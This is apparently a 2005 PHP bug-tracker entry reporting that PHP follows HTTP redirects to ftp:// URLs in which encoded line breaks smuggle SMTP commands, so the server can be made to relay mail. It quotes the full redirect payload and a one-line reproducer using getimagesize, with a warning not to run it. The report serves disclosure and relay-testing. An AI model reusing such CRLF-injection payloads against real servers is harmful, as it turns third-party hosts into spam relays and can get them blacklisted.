ID: 32936 Updated by: [EMAIL PROTECTED] Reported By: herbert dot groot dot jebbink at gmail dot com -Status: Open +Status: Assigned Bug Type: FTP related Operating System: Linux PHP Version: 5.0.4 -Assigned To: +Assigned To: pollita New Comment:
Interresting... Previous Comments: ------------------------------------------------------------------------ [2005-05-04 00:33:27] herbert dot groot dot jebbink at gmail dot com Description: ------------ See http://dsbl.org/relay-methods#FTPURL for more details. A exploit can be found at http://dividedsky.net/gfx/badges This URL gives the next result. HTTP/1.x 302 Found Date: Tue, 03 May 2005 21:43:41 GMT Server: Apache/2.0.53 (Debian GNU/Linux) PHP/4.3.10-10 Content-Location: badges.php Vary: negotiate TCN: choice X-Powered-By: PHP/4.3.10-10 Location: ftp://foo%0D%0AMAIL%20FROM%3A<>%0D%0ARCPT%20TO%3A<listme%40listme.dsbl.org>%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AVv%2FcqZoUAlAyMb9O2R+Xu0YSwQNRN5DL%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:[EMAIL PROTECTED]:25/ Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=ISO-8859-1 Reproduce code: --------------- <?php // DO NOT RUN THIS CODE // YOUR SERVER WILL BE LISTED ON DSBL.ORG // RESULTING IN POSSIBLE REJECTS OF YOUR EMAILS $check = getimagesize('http://dividedsky.net/gfx/badges') ; ?> ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=32936&edit=1
